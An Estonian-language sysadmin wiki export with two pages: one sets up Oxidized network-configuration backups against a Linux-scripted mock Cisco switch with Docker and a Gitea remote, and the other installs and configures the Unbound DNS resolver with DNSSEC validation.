* oxidized ei kasuta sql vms andmebaasi, andmeid hoitakse failisüsteemis (ehedalt ja git repona)
* gitea kasutab vajadusel postgresql andmebaasi kasutajate jms hoidmiseks, vaikimisi kasutab sqlite3 baasi; ja git'i

===Mock switch - Linux kasutaja shell script===

Mock switch seisneb Linux operatsioonisüsteemi tavalise kasutaja tekitamises, mille shell on asendatud nt sellise skriptiga

<pre>
root@zabbix-pub-01:~# grep cisco /etc/passwd
cisco:x:1001:1001::/home/cisco:/home/cisco/router_cli.sh
</pre>

ja

<pre>
root@zabbix-pub-01:~# cat /home/cisco/router_cli.sh
#!/bin/bash

# 1. Print a fake Cisco login welcome and prompt instantly on connection
echo "Cisco IOS Software, Simulation Engine Version 1.0(MOCK)"
echo ""
echo -n "mock-edge-sw01#"

# 2. Enter an infinite loop to read incoming commands interactively
while true; do
# Read the next command passed over the terminal stream
read -r CMD

# Clean up trailing carriage returns (\r) sent by network tools
CMD=$(echo "$CMD" | tr -d '\r' | tr -d '"' | tr -d "'")

case "$CMD" in
"show run"|"show running-config"|"show startup-config")
cat /home/cisco/mock_cisco.cfg
;;
"show version")
echo "Cisco IOS Software, Simulation Engine Version 1.0(MOCK)"
;;
"terminal length 0"|"terminal width 0"|"enable"|"")
# Return success silently for environment setup instructions
;;
"exit"|"quit")
echo "Closing connection."
exit 0
;;
*)
# If Oxidized sends an unhandled cleanup command, absorb it silently
;;
esac

# CRITICAL: Print the Cisco prompt back to the stream so Oxidized
# knows the command finished and it is safe to send the next line!
echo -n "mock-edge-sw01#"
done
</pre>

koos enablega

<pre>
#!/bin/bash

# 1. Print a fake Cisco login welcome and start with USER privilege prompt (>)
echo "Cisco IOS Software, Simulation Engine Version 1.0(MOCK)"
echo ""
echo -n "mock-edge-sw01>" # <--- Note the '>' here!

# Keep track of whether we are in enable mode or not
IS_ENABLED=false

# 2. Enter the infinite loop
while true; do
read -r CMD
CMD=$(echo "$CMD" | tr -d '\r' | tr -d '"' | tr -d "'")

# If Oxidized sends 'enable', simulate the password challenge
if [ "$CMD" = "enable" ] && [ "$IS_ENABLED" = false ]; then
echo -n "Password: "
read -r EN_PASS # Blindly absorb the enable password sent by Oxidized
IS_ENABLED=true
echo -n "mock-edge-sw01#" # Send the privileged prompt!
continue
fi

# Process commands based on state
case "$CMD" in
"show run"|"show running-config"|"show startup-config")
if [ "$IS_ENABLED" = true ]; then
cat /home/cisco/mock_cisco.cfg
else
echo "% Unauthorized command."
fi
;;
"show version")
echo "Cisco IOS Software, Simulation Engine Version 1.0(MOCK)"
;;
"terminal length 0"|"terminal width 0"|"")
# Return success silently for environment setup instructions
;;
"exit"|"quit")
echo "Closing connection."
exit 0
;;
*)
# Absorbs unhandled strings
;;
esac

# Print the correct trailing prompt depending on our simulated privilege level
if [ "$IS_ENABLED" = true ]; then
echo -n "mock-edge-sw01#"
else
echo -n "mock-edge-sw01>"
fi
done
</pre>

ning näidis seadistusfail st switch conf

<pre>
root@zabbix-pub-01:~# cat /home/cisco/mock_cisco.cfg
!
hostname mock-edge-sw01
!
interface GigabitEthernet1/1
description Uplink to Core
switchport mode trunk
!
interface GigabitEthernet1/2
description Connected to Zabbix Proxy
switchport access vlan 10
!
end
</pre>

ja vaigistada banneri esitamine

<pre>
root@zabbix-pub-01:~# touch /home/cisco/.hushlogin
root@zabbix-pub-01:~# chown cisco:cisco /home/cisco/.hushlogin
</pre>

Kasutamise testimiseks

<pre>
root@dh-minio-01:~# ssh cisco@192.168.10.193
cisco@192.168.10.193's password:
Cisco IOS Software, Simulation Engine Version 1.0(MOCK)

mock-edge-sw01#show run
!
hostname mock-edge-sw01
!
interface GigabitEthernet1/1
description Uplink to Core
switchport mode trunk
!
interface GigabitEthernet1/2
description Connected to Zabbix Proxy
switchport access vlan 10
!
end
mock-edge-sw01#exit
Closing connection.
Connection to 192.168.10.193 closed.
root@dh-minio-01:~#
imreoolberg@Imres-MacBook-Air ~ %
</pre>

===Paigaldamine - Docker===

Docker compose ja volume ressurssidele vajalikud kataloogid

<pre>
# mkdir -p /srv/oxidized/dc
# mkdir -p /srv/oxidized/volume/home/oxidized/.config/oxidized
# chmod 0777 /srv/oxidized/volume/home/oxidized/.config/oxidized
</pre>

Docker compose faili näidis

<pre>
# cd /srv/oxidized/dc
# cat docker-compose-oxidized.yaml
name: p_oxidized
services:
svc_oxidized:
image: oxidized/oxidized:latest
container_name: cn_oxidized
restart: unless-stopped

ports:
- "8888:8888" # Web UI and REST API
volumes:
- '/srv/oxidized/volume/home/oxidized/.config/oxidized:/home/oxidized/.config/oxidized'
- '/srv/oxidized/volume/home/oxidized/.ssh:/home/oxidized/.ssh'

environment:
- CONFIG_RELOAD_INTERVAL=600
- TZ=Europe/Tallinn

networks:
- nw_oxidized

networks:
nw_oxidized:
name: nw_oxidized
driver: bridge
</pre>

Oxidized seadistamine

* oxidized seadistusfail - /srv/oxidized/volume/home/oxidized/.config/oxidized/config - moodustab ise konteineri käivitamisel alguseks sobiva sisuga
* ruuterite-switchide-jms-seadmete ligipääsufail - /srv/oxidized/volume/home/oxidized/.config/oxidized/router.db - inimene moodustab
* config failis tuleks kasutada alustuseks username ja password väärtustena reaalset mock ligipääsu; selleks et router.db toimiks ligipääsu osas tuleb map: direktiiviga töötada

Ligipääsude fail, nt (sisaldab linux põhist mock'i)

<pre>
# cat /srv/oxidized/volume/home/oxidized/.config/oxidized/router.db
192.168.10.193:cisco:cisco:parool
</pre>

Käivitamine

<pre>
root@dh-minio-01:/srv/oxidized/dc# docker compose -f docker-compose-oxidized.yml up -d

root@dh-minio-01:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4ab02b28a9ca oxidized/oxidized:latest "/usr/bin/dumb-init …" 45 minutes ago Up 24 minutes 0.0.0.0:8888->8888/tcp, [::]:8888->8888/tcp cn_oxidized
</pre>

Ootus on et failisüsteemi tekib

<pre>
root@dh-minio-01:/srv/oxidized# find /srv/oxidized/volume -type f -ls
134710 4 -rw-r--r-- 1 30000 30000 250 Jun 3 14:15 /srv/oxidized/volume/home/oxidized/.config/oxidized/configs/192.168.10.193
155498 4 -rw-r--r-- 1 30000 30000 33 Jun 3 14:04 /srv/oxidized/volume/home/oxidized/.config/oxidized/router.db
134694 4 -rw-r--r-- 1 30000 30000 2 Jun 3 14:15 /srv/oxidized/volume/home/oxidized/.config/oxidized/pid
173784 4 -rw-r--r-- 1 30000 30000 921 Jun 3 14:15 /srv/oxidized/volume/home/oxidized/.config/oxidized/config
173789 4 -rw-r--r-- 1 30000 30000 1942 Jun 3 14:04 /srv/oxidized/volume/home/oxidized/.config/oxidized/crash
</pre>

kus

* configs/192.168.10.193 - varundus teksti kujul

Konteineris toimuv

<pre>
root@dh-minio-01:~# docker exec -ti 4a ps auxf
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 70 25.0 0.0 6392 3764 pts/0 Rs+ 11:35 0:00 ps auxf
root 1 0.0 0.0 2420 1368 ? Ss 11:15 0:00 /usr/bin/dumb-init -- runsvdir -P /etc/service
root 7 0.0 0.0 2588 1484 ? Ss 11:15 0:00 runsvdir -P /etc/service
root 8 0.0 0.0 2436 1460 ? Ss 11:15 0:00 \_ runsv oxidized
oxidized 11 0.0 1.0 1348956 61436 ? Sl 11:15 0:01 | \_ /usr/bin/ruby3.3 /usr/local/bin/oxidized
root 9 0.0 0.0 2436 1552 ? Ss 11:15 0:00 \_ runsv auto-reload-config
root 12 0.0 0.0 4056 3220 ? S 11:15 0:00 | \_ /bin/bash ./run
root 62 0.0 0.0 2580 1616 ? S 11:35 0:00 | \_ sleep 600
root 10 0.0 0.0 2436 1484 ? Ss 11:15 0:00 \_ runsv update-ca-certificates
root 13 0.0 0.0 4056 3276 ? S 11:15 0:00 \_ /bin/bash ./run
root 14 0.0 0.0 2580 1580 ? S 11:15 0:00 \_ sleep infinity
</pre>

Ruby sisu

<pre>
root@dh-minio-01:~# docker exec -ti 4a gem list oxidized rugged

*** LOCAL GEMS ***

oxidized (0.37.0)
oxidized-web (0.18.1)

*** LOCAL GEMS ***

rugged (1.9.0)
</pre>

===Oxidized seadistamine===

Kogu oxidized rakenduse seadistusfail

<pre>
root@dh-minio-01:/srv/oxidized/dc# cat ../volume/home/oxidized/.config/oxidized/config
---
username: cisco
password: parool
model: junos
resolve_dns: true
interval: 3600
debug: false
run_once: false
threads: 30
use_max_threads: false
timeout: 20
timelimit: 300
retries: 3
prompt: !ruby/regexp /^([\w.@-]+[#>]\s?)$/
next_adds_job: false
vars: {}
groups: {}
group_map: {}
models: {}
pid: "/home/oxidized/.config/oxidized/pid"
extensions:
oxidized-web:
load: false
crash:
directory: "/home/oxidized/.config/oxidized/crashes"
hostnames: false
stats:
history_size: 10
input:
default: ssh, telnet
debug: false
ssh:
secure: false
ftp:
passive: true
utf8_encoded: true
output:
default: file
file:
directory: "/home/oxidized/.config/oxidized/configs"
source:
default: csv
csv:
file: "/home/oxidized/.config/oxidized/router.db"
delimiter: !ruby/regexp /:/
field:
name: 0
model: 1
map:
name: 0
model: 1
username: 2
password: 3
gpg: false
model_map:
juniper: junos
cisco: ios
</pre>

kus

* source -> csv -> field ja -> map tuleb kohendada nt selliseks nagu ülal toodud, et ta oskaks router.db failist kasutada kasutajanime ja parooli
* output > default -> file muudetakse allpool git vastu

===Webgui===

Webgui kasutamiseks tuleb käivitada nn veebiserveri konteineris

<pre>
root@dh-minio-01:~# grep rest /srv/oxidized/volume/home/oxidized/.config/oxidized/config
rest: 0.0.0.0:8888
</pre>

paistab brauseris

[[Fail:20260603-oxidized-01.png|900px]]

kus

* TODO

===lokaalse git repo kasutamine varunduseks===

Väited

* võimalik on kasutada lokaalset git repot storage lahendusena

Nö tavalisele oxidized seadistusfaili sees peab olema sarnane output osakond

<pre>
..
output:
default: git
git:
user: Oxidized Robot
email: oxidized@auul.pri.ee
repo: /home/oxidized/.config/oxidized/devices-backups.git
...
</pre>

Tulemusena

<pre>
...
</pre>

===remote git repo liidestamine süsteemiga===

Väited

* remote git repo liidestatakse mitte iseseisva nö storage lahendusena, aga toetava git lahendusena
* remote git repo kasutamise eelduseks on lokaalse git repo kasutamine

Nö tavalisele oxidized seadistusfaili sees peab olema sarnane output osakond

<pre>
..
output:
default: git
git:
user: Oxidized Robot
email: oxidized@auul.pri.ee
repo: /home/oxidized/.config/oxidized/devices-backups.git
...

hooks:
push_to_remote:
type: githubrepo
events: [post_store]
remote_repo: ssh://git@192.168.10.163:2222/oxidized/devices-backups.git
publickey: /home/oxidized/.ssh/id_ed25519-gitea.pub
privatekey: /home/oxidized/.ssh/id_ed25519-gitea

....
</pre>

kus

* git@ on tehniliselt kasutajanimi, aga kõik kasutajad pöörduvad selle kasutajanimega
* kasutaja identiteet tehakse git repo poolel kindlaks ssh võtme alusel

ssh kasutaja autentimise ettevalmistamine, tekitada priv ja pub võtmed

host# ssh-keygen -f /srv/oxidized/volume/home/oxidized/.ssh/id_ed25519-gitea

kohendada docker compose failis kasutaja:grupp sobivaks, vaatates eeskujuks olemasolevaid, nt

<pre>
host# chown -R 30000:30000 /srv/oxidized/volume/home/oxidized/.ssh
</pre>

Paigutada pub võti gitea webgui peal sobivasse kohta.

Veenduda ssh töötamises, nt

<pre>
root@dh-minio-01:/srv/oxidized/dc# docker exec -ti cn_oxidized bash

root@75b0bf77531a:/# su - oxidized

oxidized@75b0bf77531a:~$ ssh -i .ssh/id_ed25519-gitea git@192.168.10.163 -p 2222
PTY allocation request failed on channel 0
Hi there, admin! You've successfully authenticated with the key named from-oxidized, but Gitea does not provide shell access.
If this is unexpected, please log in with password and setup Gitea under another user.
Connection to 192.168.10.163 closed.
</pre>

Oxidized webguis versioonid paistavad nii

[[Fail:20260603-oxidized-02.png|900px]]

Gitea webguis versioonid paistavad nii

[[Fail:20260603-oxidized-03.png|900px]]

===Misc===

<pre>
username: oxidezed
password: parool
model: cisco
interval: 7200
use_syslog: true
debug: false
threads: 30
timeout: 120
retries: 3
prompt: !ruby/regexp /^([\w.@-]+[#>]\s?)$/
rest: 0.0.0.0:8888
vars:
enable: parool
remove_secret: true
auth_methods: [ "password", "keyboard-interactive" ]
pid: "~/.config/oxidized/pid"
input:
default: ssh
debug: ~/.config/oxidized/log_input
ssh:
secure: false
output:
default: git
git:
user: oxidized
email: imre@imre
repo: "~/devices.git"
#output:
# default: file
# file:
# directory: "/opt/oxidized/.config/oxidized/configs"

source:
default: csv
csv:
file: "~/.config/oxidized/router.db"
delimiter: !ruby/regexp /:/
map:
name: 0
model: 1
status: 2
group: 3
model_map:
cisco: ios

groups:
GR_AUUL:
username: cisco
password: parool
vars:
ssh_port: 22264
models: {}
</pre>

<pre>
imre@imre-mac ~ % diff gem-list-20260607-rv-oxidized.txt gem-list-20260607-imre-oxidized.txt
1,3c1,3
< asetus (0.3.0)
< backports (3.23.0)
< bcrypt_pbkdf (1.1.0)
---
> asetus (0.4.0)
> backports (3.25.3)
> bcrypt_pbkdf (1.1.2)
6c6
< bundler (default: 2.1.2)
---
> bundler (2.1.4, default: 2.1.2)
8c8
< charlock_holmes (0.7.7)
---
> charlock_holmes (0.7.9)
14c14
< ed25519 (1.2.4)
---
> ed25519 (1.3.0)
25c25
< htmlentities (4.3.4)
---
> htmlentities (4.4.2)
29c29
< json (default: 2.3.0)
---
> json (2.19.8, default: 2.3.0)
32a33
> molinillo (0.6.4)
34a36
> net-http-persistent (2.9.4)
56,57c58,59
< rb-fsevent (0.11.0)
< rb-inotify (0.10.1)
---
> rb-fsevent (0.11.2)
> rb-inotify (0.11.1)
64c66
< rugged (0.28.5)
---
> rugged (0.99.0, 0.28.5)
71c73
< slop (4.9.1, 3.6.0)
---
> slop (4.10.1, 4.9.1, 3.6.0)
74c76
< temple (0.8.2)
---
> temple (0.10.4)
76c78,79
< tilt (2.0.10)
---
> thor (0.19.4)
> tilt (2.7.0)
</pre>

===Misc 2===

<pre>
# df -h -t ext4 -T
Filesystem Type Size Used Avail Use% Mounted on
/dev/mapper/system-root ext4 24G 18G 5.3G 77% /
/dev/mapper/system-mysql ext4 49G 35G 13G 74% /var/lib/mysql
/dev/mapper/system-rrd ext4 196G 154G 33G 83% /opt/observium/rrd
/dev/mapper/system-tmpdir ext4 2.9M 14K 2.6M 1% /srv/mysqlbackup
</pre>

<pre>
# systemctl status srv-mysqlbackup.mount
● srv-mysqlbackup.mount - /srv/mysqlbackup
Loaded: loaded (/proc/self/mountinfo)
Active: active (mounted) since Thu 2026-06-18 01:05:15 EEST; 11h ago
Where: /srv/mysqlbackup
What: /dev/mapper/system-tmpdir

# systemctl show srv-mysqlbackup.mount | less
Where=/srv/mysqlbackup
What=/dev/mapper/system-tmpdir
Options=rw,relatime,stripe=256,data=ordered
Type=ext4
TimeoutUSec=1min 30s
ControlPID=0
DirectoryMode=0755
SloppyOptions=no
LazyUnmount=no
ForceUnmount=no
Result=success
UID=[not set]
GID=[not set]
Slice=system.slice
MemoryCurrent=[not set]
CPUUsageNSec=[not set]
TasksCurrent=[not set]
IPIngressBytes=18446744073709551615
IPIngressPackets=18446744073709551615
IPEgressBytes=18446744073709551615
IPEgressPackets=18446744073709551615
Delegate=no
CPUAccounting=no
CPUWeight=[not set]
StartupCPUWeight=[not set]
CPUShares=[not set]
StartupCPUShares=[not set]
CPUQuotaPerSecUSec=infinity
IOAccounting=no
IOWeight=[not set]
StartupIOWeight=[not set]
BlockIOAccounting=no
BlockIOWeight=[not set]
StartupBlockIOWeight=[not set]
MemoryAccounting=no
MemoryLow=0
MemoryHigh=infinity
MemoryMax=infinity
MemorySwapMax=infinity
MemoryLimit=infinity
DevicePolicy=auto
TasksAccounting=yes
TasksMax=17203
IPAccounting=no
UMask=0022
LimitCPU=infinity
LimitCPUSoft=infinity
LimitFSIZE=infinity
LimitFSIZESoft=infinity
LimitDATA=infinity
LimitDATASoft=infinity
LimitSTACK=infinity
LimitSTACKSoft=8388608
LimitCORE=infinity
LimitCORESoft=0
LimitRSS=infinity
LimitRSSSoft=infinity
LimitNOFILE=4096
LimitNOFILESoft=1024
LimitAS=infinity
LimitASSoft=infinity
LimitNPROC=1030297
LimitNPROCSoft=1030297
LimitMEMLOCK=67108864
LimitMEMLOCKSoft=67108864
LimitLOCKS=infinity
LimitLOCKSSoft=infinity
LimitSIGPENDING=1030297
LimitSIGPENDINGSoft=1030297
LimitMSGQUEUE=819200
LimitMSGQUEUESoft=819200
LimitNICE=0
LimitNICESoft=0
LimitRTPRIO=0
LimitRTPRIOSoft=0
LimitRTTIME=infinity
LimitRTTIMESoft=infinity
OOMScoreAdjust=0
Nice=0
IOSchedulingClass=0
IOSchedulingPriority=0
CPUSchedulingPolicy=0
CPUSchedulingPriority=0
TimerSlackNSec=50000
CPUSchedulingResetOnFork=no
NonBlocking=no
StandardInput=null
StandardInputData=
StandardOutput=journal
StandardError=inherit
TTYReset=no
TTYVHangup=no
TTYVTDisallocate=no
SyslogPriority=30
SyslogLevelPrefix=yes
SyslogLevel=6
SyslogFacility=3
LogLevelMax=-1
SecureBits=0
CapabilityBoundingSet=cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid cap_kill cap_setgid cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock cap_ipc_owner
cap_sys_module cap_sys_rawio cap_sys_chroot cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config cap_mknod cap_lease cap_audit_write cap_audit_control cap_setfcap cap_mac_override
cap_mac_admin cap_syslog cap_wake_alarm cap_block_suspend
AmbientCapabilities=
DynamicUser=no
RemoveIPC=no
MountFlags=
PrivateTmp=no
PrivateDevices=no
ProtectKernelTunables=no
ProtectKernelModules=no
ProtectControlGroups=no
PrivateNetwork=no
PrivateUsers=no
ProtectHome=no
ProtectSystem=no
SameProcessGroup=yes
UtmpMode=init
IgnoreSIGPIPE=yes
NoNewPrivileges=no
SystemCallErrorNumber=0
LockPersonality=no
RuntimeDirectoryPreserve=no
RuntimeDirectoryMode=0755
StateDirectoryMode=0755
CacheDirectoryMode=0755
LogsDirectoryMode=0755
ConfigurationDirectoryMode=0755
MemoryDenyWriteExecute=no
RestrictRealtime=no
RestrictSUIDSGID=no
RestrictNamespaces=no
MountAPIVFS=no
KeyringMode=private
KillMode=control-group
KillSignal=15
SendSIGKILL=yes
SendSIGHUP=no
Id=srv-mysqlbackup.mount
Names=srv-mysqlbackup.mount
Requires=system.slice dev-mapper-system\x2dtmpdir.device -.mount
WantedBy=dev-mapper-system\x2dtmpdir.device
Conflicts=umount.target
Before=umount.target local-fs.target
After=-.mount systemd-journald.socket system.slice dev-mapper-system\x2dtmpdir.device local-fs-pre.target
RequiresMountsFor=/srv
Description=/srv/mysqlbackup
LoadState=loaded
ActiveState=active
SubState=mounted
SourcePath=/proc/self/mountinfo
StateChangeTimestamp=Thu 2026-06-18 01:05:15 EEST
StateChangeTimestampMonotonic=2353248905053
InactiveExitTimestamp=Thu 2026-06-18 01:05:15 EEST
InactiveExitTimestampMonotonic=2353248905053
ActiveEnterTimestamp=Thu 2026-06-18 01:05:15 EEST
ActiveEnterTimestampMonotonic=2353248905053
ActiveExitTimestampMonotonic=0
InactiveEnterTimestampMonotonic=0
CanStart=yes
CanStop=yes
CanReload=yes
CanIsolate=no
StopWhenUnneeded=no
RefuseManualStart=no
RefuseManualStop=no
AllowIsolate=no
DefaultDependencies=yes
OnFailureJobMode=replace
IgnoreOnIsolate=yes
NeedDaemonReload=no
JobTimeoutUSec=infinity
JobRunningTimeoutUSec=infinity
JobTimeoutAction=none
ConditionResult=no
AssertResult=no
ConditionTimestampMonotonic=0
AssertTimestampMonotonic=0
Transient=no
Perpetual=no
StartLimitIntervalUSec=10s
StartLimitBurst=5
StartLimitAction=none
FailureAction=none
SuccessAction=none
InvocationID=092a9a19be674f069064d8c22ba8e7b5
CollectMode=inactive
</pre>

===Kasulikud lisamaterjalid===

* https://oneuptime.com/blog/post/2026-02-08-how-to-run-oxidized-in-docker-for-network-config-backup/view
* https://hub.docker.com/r/oxidized/oxidized
* [[:Gitea kasutamine]]

Rekursiivse resolveri Unbound kasutamine operatsioonisüsteemiga Debian

2026-06-18T05:47:16Z

Imre: /* 2026 kevad märkused */

[[Kategooria:Interneti domeeninimede süsteem]]
===Sissejuhatus===

Üks võimalus liigitada nimeservereid või nimeserverite tarkvara on selle järgi, millised päringuid teenindatakse

* pädev ehk autoriteetne (ingl. k. authoritative) - vastab päringutele ainult nimeserveri tsoonifailis kirjeldatud andmete alusel; autoriteetsed nimeserverid teenindavad reeglina resolverite päringuid
* rekursiivne (ingl. k. recursive) - rekursiivne nimeserver ei sisalda nö oma tsoonifaili, st ta ei ole mingite vastuste osas autoriteetne; rekursiivne nimeserver teenindab mingi piiratud hulga klientide päringuid lahendades neid autoriteetsete nimeserverite abil ja seetõttu nimetatakse rekursiivset nimeserverit tihti resolveriks (ingl. k. to resolve - lahendama)

Unbound http://www.unbound.net/ resolveril on selliseid omadused

* rekursiivne - lahendab nö lõppkasutaja esitatud päringuid, nt sobib seadistada töökohaarvuti nimeserveriks
* vaheladustav (ingl. k. caching) - Unbound peab kord lahendatud vastust mõnda aega meeles, mis tähendab, et järgmisele samale päringule vastab ta kliendile kohe ja ei pea omakorda pöörduma vastuse saamiseks autoriteetsete nimeserverite poole
* valideeriv - toetab DNSSEC kasutamist
* IPv6 tugi

Rekursiivse resolveri vastutus on parimal võimalikul moel anda kliendi esitatud päringule vastus, seejuures

* kasutada vastuse koostamisel mitmete pädevate nimeserverite abi
* anda õige vastus - nt mitte ennast lasta eksitada cache poisoning tehnikatest, võimalusel kasutada DNSSEC vahendeid
* vastata kiiresti

===Unbound paigaldamine===

2011 aastal leidub paljude operatsioonisüsteemide paketihalduses Unbound tarkvara.

====Debian====

Debian Squeeze sisaldab versiooni 1.4.6 ja paigaldamiseks sobib öelda

# apt-get install unbound

====OpenBSD====

OpenBSD 5.4 sisaldab binaarse paketina versiooni 1.4.9 ja paigaldamiseks sobib öelda

# pkg_add unbound
unbound-1.4.20:libldns-1.6.16p0: ok
useradd: Warning: home directory `/var/unbound' doesn't exist, and -m was not specified
unbound-1.4.20: ok
The following new rcscripts were installed: /etc/rc.d/unbound
See rc.d(8) for details.
--- +unbound-1.4.20 -------------------
You should add:

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

to /etc/rc.conf.local to create a syslog socket in the unbound chroot.

Selleks, et /etc/rc.d/unbound skript töötaks, peab olema seadistatud unbound-control (127.0.0.1 pealt).

===Unbound seadistamine===

Resolveri seadistusfailis tuleb näidata muu hulgas

* juurnimeserverite aadressid
* millisel aadressil resolver päringuid teenindab
* millised kliendid saavad resolverit kasutada, tavaliselt kliendi src ip aadressi täpsusega

Unbound tööd juhib seadistusfail unbound.conf

* /etc/unbound/unbound.conf - Debian
* /var/unbound/etc/unbound.conf - OpenBSD

Lihtsamal juhul võib kasutada nt sellise sisuga seadistusfaili

server:
interface: 192.168.10.190
outgoing-interface: 192.168.10.190
access-control: 192.168.1.0/24 allow
access-control: 192.168.10.0/24 allow_snoop
root-hints: "/var/unbound/etc/named.cache"

kus

* interface - millisel aadressil arvuti Unbound resolveri kliente teenindab
* outgoing-interface - milliselt aadressilt resolveri päringud autoriteetsetele nimeserveritele väljuvad
* access-control - millistelt ip aadressidelt saab Unbound resolverit kasutada; allow lubab esitada ainult rekursiivseid päringuid, nt +norec annab vaikimisi refused vastuse

$ dig +norec @nimeserver domeeni.nimi
...
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 52133

allow_snoop lubab mõlemaid (viimane on vajalik, et unbound kasutaja saaks öelda

$ dig +trace @nimeserver domeeni.nimi

* root-hints - resolver peab alati teadma interneti juurnimeserverite aadresse

Juurnimeserverite aadresse saab küsida mõnes juba seadistatud resolveriga arvutis

$ dig . ns

või kopeerida aadressilt Linuxis

$ wget ftp://FTP.INTERNIC.NET/domain/named.cache

OpenBSD keskkonnas

$ ftp ftp://FTP.INTERNIC.NET/domain/named.cache

===Unbound käivitamine===

Unbound resolver teenindab päringuid portidel 53/udp ja 53/tcp.

====Debian====

Käivitamiseks tuleb öelda

# /etc/init.d/unbound start | stop

====OpenBSD====

Selleks, et Unbound töötaks OpenBSD all chroot keskkonnas kataloogis /var/unbound kasutajana _unbound tuleb kasutada seadistusfailis rida

chroot: "/var/unbound"

Et chroot keskkonnas töötav Unbound saaks logida syslog'i tuleb syslog käivitamisel lisaks kasutada '-a /var/unbound/dev/log'

# syslogd -a /var/www/dev/log -a /var/empty/dev/log -a /var/unbound/dev/log

/etc/rc.conf.local failis sobib kasutada rida

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

2012 kevadel ütleb OpenBSD v. 5.1 paketihalduse unbound chroot kasutamisel kävitamisel nii

# unbound -dv
[1335943357] unbound[20534:0] notice: Start of unbound 1.4.15.
[1335943357] unbound[20534:0] warning: increased limit(open files) from 128 to 4140
[1335943357] unbound[20534:0] warning: unable to setusercontext _unbound: Bad file descriptor

Limiitide tuleb töötada sarnaselt nagu on kirjeldatud aadressil http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_OpenBSD_kasutamine#Login_class_kasutamine.

Tavalisel viisil sobib kasutada käivitusskripti

# /etc/rc.d/unbound start | stop

Vastasel korral on logis midagi sellist

Mar 13 16:03:01 unbound[28759:0] error: can't create socket: Too many open files

===Unbound kasutamine===

Unbound resolveri kasutajateks on tavaliselt arvutid, mis vajavad nimelahendust, nt kohtvõrgu arvutid, eposti serverid jt kusjuures Unbound protsess töötab selleks ettenähtud arvutis või võrgusõlmeks olevas seadmes

internet
...
|
_|_
| | OpenBSD võrgusõlm
|___| Unbound protsess
|
--|---|----------|-----------|--
| | |

dns kliendid (töökohaarvuti, serverid)

Linux keskkonnas sobib näidata nimeserveri aadress staatiliselt arvuti /etc/resolv.conf failis nt reaga

nameserver 192.168.10.190

Unbound resolveri tööd saab kontrollida nt öeldes mõnes arvutis, kus peab kõnealust resolverit saama kasutada

$ dig @192.168.10.190 kuutorvaja.eenet.ee a

ja vastus peaks sisaldama sarnaseid ridu rida

...
;; QUESTION SECTION:
;kuutorvaja.eenet.ee. IN A

;; ANSWER SECTION:
kuutorvaja.eenet.ee. 83840 IN A 193.40.0.7
..

===Nimepäringu vastuse valideerimine===

Nimepäringute vastuste valideerimiseks kasutatakse üldiselt DNSSEC tehnikat. 2011 aastal on selleks mitmeid võimalusi, kaks populaarsemat on

* signeeritud tsoonifailidega juurnimeserverite kasutamine, kõige loomulikum viis
* DLV (DNSSEC Look-aside Validation) - üleminekuaja häkk

Kui nimeteenust kasutatakse sarnaselt ülaltoodud skeemile, siis peab arvestama, et DNSSEC kontroll toimub Unbound protsessi juures, sealt edasi kliendini liigub vastus tavalise avateksina üle kohtvõrgu ja klient otsustab vastuse turvalisuse üle ad biti järgi vastuses. Seetõttu on reeglina soovitav, et Unbound töötaks nimeteenust kasutatavatele arvutitele võimalikult lähedal.

DNSSEC juurutamise kronoloogia

* 15. juuli 2010 - juurnimeserverid kasutavad signeeritud tsoone http://www.root-dnssec.org/
* ? - .org tsoon on signeeritud
* 31. märts 2011 - .com tsoon on signeeritud http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/

Kasulikud lisamaterjalid

* http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/
* http://blogs.pcmag.com/securitywatch/2011/03/dnssec_in_com_domain_is_a_good.php

====Signeeritud tsoonifailiga juurnimeserverite kasutamine====

Unbound seadistamiseks tuleb kasutada seadistusfailis rida

auto-trust-anchor-file: "root.key"

kusjuures fail peab olema unbound protsessile kirjutatav ning esialgselt sisaldama rida (as per http://unbound.net/documentation/howto_anchor.html)

# cat /var/unbound/etc/root.key
. IN DS 19036 8 2 49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5

# chown _unbound /var/unbound/etc
# chown _unbound:_unbound /var/unbound/etc/root.key

Peale unbound protsessi käivitamist selle faili sisu muutub automaatselt.

Kontrollimiseks sobib öelda

$ dig . ns +dnssec +multiline

; <<>> DiG 9.7.2-P3 <<>> . ns +dnssec +multiline
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4737
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 518267 IN NS m.root-servers.net.
. 518267 IN NS g.root-servers.net.
. 518267 IN NS b.root-servers.net.
. 518267 IN NS h.root-servers.net.
. 518267 IN NS a.root-servers.net.
. 518267 IN NS e.root-servers.net.
. 518267 IN NS k.root-servers.net.
. 518267 IN NS f.root-servers.net.
. 518267 IN NS c.root-servers.net.
. 518267 IN NS j.root-servers.net.
. 518267 IN NS i.root-servers.net.
. 518267 IN NS l.root-servers.net.
. 518267 IN NS d.root-servers.net.
. 518267 IN RRSIG NS 8 0 518400 20110409000000 (
20110401230000 34525 .
De4SFgTDwpgbz1JjTlaPzu7ZNRURLSnoYmQQQIZq7Gny
RghOrsvS1soH5F43Gxr5BIi+422EBLJIrEHFnbvLy22S
LqKtSw67eDdsBZyjE5fTtDHyYhnoR8YQWswgGVMRk4Ek
iDDMIOk5pF+CvbML6TlvTWrnPCwNWXnbLFnT9SY= )

;; Query time: 0 msec
;; SERVER: 10.192.0.53#53(10.192.0.53)
;; WHEN: Sat Apr 2 18:44:16 2011
;; MSG SIZE rcvd: 397

kus tuleb tähele panna

* vastus sisaldab RRSIG kirjet
